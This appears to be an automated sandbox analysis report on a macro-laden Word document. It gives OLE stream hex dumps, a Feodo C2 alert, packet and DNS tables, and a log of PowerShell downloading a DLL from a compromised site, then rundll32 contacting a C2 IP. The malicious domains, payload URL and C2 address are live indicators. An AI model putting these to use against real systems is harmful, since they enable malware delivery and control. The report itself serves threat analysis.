                      VBA Code Keywords

                      Keyword
                      Document_open()
                      VB_Creatable
                      False
                      Private
                      VB_Exposed
                      Attribute
                      VB_Name
                      VB_PredeclaredId
                      VB_GlobalNameSpace
                      VB_Base
                      VB_Customizable
                      VB_TemplateDerived
                      VBA Code
                      VBA File Name: P0_myy5fnenf, Stream Size: 699
                      General
                      Stream Path:Macros/VBA/P0_myy5fnenf
                      VBA File Name:P0_myy5fnenf
                      Stream Size:699
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 0c ff f1 d1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Attribute
                      VB_Name
                      VBA Code

                      Streams

                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                      General
                      Stream Path:\x1CompObj
                      File Type:data
                      Stream Size:146
                      Entropy:4.00187355764
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      File Type:data
                      Stream Size:4096
                      Entropy:0.280929556603
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . o @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 544
                      General
                      Stream Path:\x5SummaryInformation
                      File Type:data
                      Stream Size:544
                      Entropy:4.17934415163
                      Base64 Encoded:False
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                      General
                      Stream Path:1Table
                      File Type:data
                      Stream Size:6424
                      Entropy:6.13683822603
                      Base64 Encoded:True
                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                      Stream Path: Data, File Type: data, Stream Size: 99188
                      General
                      Stream Path:Data
                      File Type:data
                      Stream Size:99188
                      Entropy:7.39015578121
                      Base64 Encoded:True
                      Data ASCII:t . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . 7 . . " . . . . . . e i U . . . . . . . . . . . D . . . . . _ . . F . . . . . . . . 7 . . " . . . . . . e i U . . . . . . .
                      Data Raw:74 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 502
                      General
                      Stream Path:Macros/PROJECT
                      File Type:ASCII text, with CRLF line terminators
                      Stream Size:502
                      Entropy:5.4581902648
                      Base64 Encoded:True
                      Data ASCII:I D = " { 7 B C 8 9 A B C - 1 9 3 3 - 4 F 3 3 - A 1 B A - 8 1 7 6 5 C 7 3 8 7 1 6 } " . . D o c u m e n t = K y l 0 l 3 r q w 2 8 0 c 6 s s a / & H 0 0 0 0 0 0 0 0 . . M o d u l e = P 0 _ m y y 5 f n e n f . . M o d u l e = G x 8 f z n t 8 p 0 b . . E x e N a m e 3 2 = " W h k r t 3 k 9 v w q q " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 0 A A 8 0 E A 8 0 E A 8 0 E A 8 0 E " . . D P B = " 3 D 3 F E F 7
                      Data Raw:49 44 3d 22 7b 37 42 43 38 39 41 42 43 2d 31 39 33 33 2d 34 46 33 33 2d 41 31 42 41 2d 38 31 37 36 35 43 37 33 38 37 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 50 30 5f 6d 79 79 35 66 6e 65 6e 66 0d 0a 4d 6f 64 75 6c 65 3d 47 78 38 66 7a 6e 74 38 70 30 62 0d 0a 45 78 65
                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
                      General
                      Stream Path:Macros/PROJECTwm
                      File Type:data
                      Stream Size:131
                      Entropy:3.74080626522
                      Base64 Encoded:False
                      Data ASCII:K y l 0 l 3 r q w 2 8 0 c 6 s s a . K . y . l . 0 . l . 3 . r . q . w . 2 . 8 . 0 . c . 6 . s . s . a . . . P 0 _ m y y 5 f n e n f . P . 0 . _ . m . y . y . 5 . f . n . e . n . f . . . G x 8 f z n t 8 p 0 b . G . x . 8 . f . z . n . t . 8 . p . 0 . b . . . . .
                      Data Raw:4b 79 6c 30 6c 33 72 71 77 32 38 30 63 36 73 73 61 00 4b 00 79 00 6c 00 30 00 6c 00 33 00 72 00 71 00 77 00 32 00 38 00 30 00 63 00 36 00 73 00 73 00 61 00 00 00 50 30 5f 6d 79 79 35 66 6e 65 6e 66 00 50 00 30 00 5f 00 6d 00 79 00 79 00 35 00 66 00 6e 00 65 00 6e 00 66 00 00 00 47 78 38 66 7a 6e 74 38 70 30 62 00 47 00 78 00 38 00 66 00 7a 00 6e 00 74 00 38 00 70 00 30 00 62 00 00
                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4495
                      General
                      Stream Path:Macros/VBA/_VBA_PROJECT
                      File Type:data
                      Stream Size:4495
                      Entropy:5.32797660773
                      Base64 Encoded:False
                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 661
                      General
                      Stream Path:Macros/VBA/dir
                      File Type:data
                      Stream Size:661
                      Entropy:6.37896546622
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                      Data Raw:01 91 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 16 c1 ed 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                      Stream Path: WordDocument, File Type: data, Stream Size: 20014
                      General
                      Stream Path:WordDocument
                      File Type:data
                      Stream Size:20014
                      Entropy:4.1368278567
                      Base64 Encoded:False
                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . H . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . b . . . b . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8f 48 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4e 00 00 62 7f 00 00 62 7f 00 00 8f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      01/12/21-20:31:20.789009TCP2404340ET CNC Feodo Tracker Reported CnC Server TCP group 214916880192.168.2.2271.72.196.159

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 12, 2021 20:31:04.502388954 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.613992929 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.614180088 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.629313946 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.740904093 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.740953922 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.740977049 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.741005898 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.741178036 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.741214037 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.754389048 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.755346060 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.865854979 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.866605043 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.866749048 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.867340088 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.978590965 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978642941 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978676081 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978705883 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978878021 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.980880976 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:05.067197084 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.092096090 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:05.139599085 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.139782906 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.140002012 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.212311983 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219491005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219544888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219584942 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219623089 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219634056 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219661951 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219698906 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219708920 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219739914 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219772100 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219779015 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219829082 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219846010 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219876051 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219939947 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292373896 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292434931 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292473078 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292522907 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292534113 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292566061 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292607069 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292612076 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292649031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292681932 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292687893 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292726040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292762995 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292767048 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292807102 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292835951 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292855978 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292905092 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292927980 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292943954 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292983055 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293020010 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293021917 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293061018 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293096066 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293101072 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293140888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293171883 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293190002 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293261051 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365664005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365725040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365765095 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365806103 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365842104 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365865946 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365890980 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365915060 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365953922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365983009 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365993023 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366033077 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366055965 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366070986 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366110086 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366134882 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366153955 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366203070 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366208076 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366245031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366283894 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366307974 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366324902 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366364956 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366388083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366400957 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366441965 CET8049167109.232.216.177192.168.2.22

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 12, 2021 20:31:04.424675941 CET5219753192.168.2.228.8.8.8
                      Jan 12, 2021 20:31:04.484715939 CET53521978.8.8.8192.168.2.22
                      Jan 12, 2021 20:31:05.009018898 CET5309953192.168.2.228.8.8.8
                      Jan 12, 2021 20:31:05.065613985 CET53530998.8.8.8192.168.2.22

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Jan 12, 2021 20:31:04.424675941 CET192.168.2.228.8.8.80x71ddStandard query (0)remediis.comA (IP address)IN (0x0001)
                      Jan 12, 2021 20:31:05.009018898 CET192.168.2.228.8.8.80x8b68Standard query (0)avadnansahin.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Jan 12, 2021 20:31:04.484715939 CET8.8.8.8192.168.2.220x71ddNo error (0)remediis.com5.2.81.171A (IP address)IN (0x0001)
                      Jan 12, 2021 20:31:05.065613985 CET8.8.8.8192.168.2.220x8b68No error (0)avadnansahin.com109.232.216.177A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • avadnansahin.com
                      • 69.49.88.46

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.2249167109.232.216.17780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampkBytes transferredDirectionData
                      Jan 12, 2021 20:31:05.140002012 CET3OUTGET /wp-includes/w/ HTTP/1.1
                      Host: avadnansahin.com
                      Connection: Keep-Alive
                      Jan 12, 2021 20:31:05.219491005 CET4INHTTP/1.1 200 OK
                      Connection: Keep-Alive
                      X-Powered-By: PHP/7.0.33
                      Set-Cookie: 5ffdf8f92dc15=1610479865; expires=Tue, 12-Jan-2021 19:32:05 GMT; Max-Age=60; path=/
                      Cache-Control: no-cache, must-revalidate
                      Pragma: no-cache
                      Last-Modified: Tue, 12 Jan 2021 19:31:05 GMT
                      Expires: Tue, 12 Jan 2021 19:31:05 GMT
                      Content-Type: application/octet-stream
                      Content-Disposition: attachment; filename="Rq7pzbnT415DFc.dll"
                      Content-Transfer-Encoding: binary
                      Transfer-Encoding: chunked
                      Date: Tue, 12 Jan 2021 19:31:05 GMT
                      Data Raw: 31 30 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5a de fd 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 46 00 00 00 d4 04 00 00 00 00 00 f0 21 00 00 00 10 00 00 00 60 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 01 09 06 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 70 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 58 15 00 00 00 50 05 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 72 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 43 00 00 00 10 00 00 00 44 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 01 00 00 00 60 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 08 00 00 00 70 00 00 00 0a 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 a4 bf 04 00 00 80 00 00 00 c0 04 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 64 00 00 00 00 40 05 00 00 02 00 00 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 d4 07 00 00 00 50 05 00 00 08 00 00 00 16 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: 10000MZ@!L!This program cannot be run in DOS mode.$PELZ_!2F!``pdXPxr.textCD `.rdata`H@@.datapJ@.text4T@.text5d@ @.relocP@B


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.224916969.49.88.4680C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      Jan 12, 2021 20:31:34.827358961 CET358OUTPOST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1
